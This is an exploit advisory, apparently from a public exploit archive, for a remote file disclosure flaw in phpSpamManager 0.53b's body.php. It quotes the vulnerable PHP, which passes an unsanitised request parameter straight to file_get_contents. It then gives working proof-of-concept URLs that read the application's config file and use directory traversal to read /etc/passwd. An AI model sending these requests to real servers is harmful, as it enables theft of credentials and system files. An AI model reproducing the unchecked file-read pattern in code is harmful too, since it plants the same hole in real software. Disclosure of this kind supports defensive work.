id: 2790
date: 03/30/2008
title: phpSpamManager 0.53b (body.php) Remote File Disclosure Vulnerability
author: GoLd_M
cves: 

====================================================================
phpSpamManager 0.53b (body.php) Remote File Disclosure Vulnerability
====================================================================



phpSpamManager 0.53 beta (body.php) Remote File Disclosure Vulnerability
Vuln Code 
Ln 38 -> 47 : 
//get filename
     $okprint=false;
     $filename = $_REQUEST['filename']; <--- XxX
     if ($filename!='FILENAME')
     {
      debug_print("analysing " .$filename);
      //replace # by dots if necessary
      $filename = preg_replace("/#/",".",$filename);
$mailtext=file_get_contents($filename); <--- XxX
	 $email=new parseMail($mailtext); <--- XxX
POC :
/phpspammanager.0.53.dev/body.php?filename=include/config.inc.php
/phpspammanager.0.53.dev/body.php?filename=../../../../../../../../etc/passwd



#  0day.today [2023-03-26]  #